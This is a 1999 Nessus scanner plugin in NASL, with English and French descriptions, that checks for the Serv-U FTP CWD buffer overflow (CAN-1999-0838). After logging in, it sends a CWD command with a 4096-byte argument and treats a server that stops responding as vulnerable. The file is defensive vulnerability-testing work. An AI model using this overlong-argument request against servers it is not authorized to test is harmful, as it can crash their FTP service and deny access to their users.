#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10089);
 script_cve_id("CAN-1999-0838");
 name["english"] = "FTP ServU CWD overflow";
 name["francais"] = "FTP ServU CWD overflow";
 
 
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "It was possible to
shut down the remote FTP server by issuing
a CWD command followed by a too long
argument.

This problem allows crackers to prevent
your site from sharing some resources
with the rest of the world.

Solution : upgrade to the latest version your FTP server.

Risk factor : Medium";


 desc["francais"] = "Il s'est avr possible
de couper le serveur FTP distant en 
faisant la commande 'CWD' suivie d'un argument
trop long. 

Ce problme permet  des pirates en herbe
d'empecher votre site de partager certaines
ressources avec le reste du monde.

Solution : mettez  jour votre server FTP.

Facteur de risque : Moyen";


 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Attempts a CWD buffer overflows";
 summary["francais"] = "Essaye un CWD buffers overflows";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_DENIAL);
 
 
 script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
		francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
 family["english"] = "Denial of Service";
 family["francais"] = "Dni de service";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes", "ftp_anonymous.nasl");
 script_require_keys("ftp/login");
 script_require_ports("Services/ftp", 21);
 exit(0);
}

#
# The script code starts here
#


#
# Microsoft's FTP server close the connection when they are
# given a too long string
#


port = get_kb_item("Services/ftp");
if(!port)port = 21;

key = string("ftp/banner/", port);
ms = get_kb_item(key);
if(ms)
{
 ms_l = tolower(ms);
 if("microsoft" >< ms_l)exit(0);
}


login = get_kb_item("ftp/login");
password = get_kb_item("ftp/password");

if(!login)exit(0);

if(get_port_state(port))
{
 soc = open_sock_tcp(port);
 if(soc)
 {
  if(ftp_log_in(socket:soc, user:login, pass:password))
  {
   s = string("CWD ", crap(4096), "\n");
   send(socket:soc, data:s);
   r = recv_line(socket:soc, length:1024);
   if(!r)security_warning(port);
  }
  close(soc);
 }
}
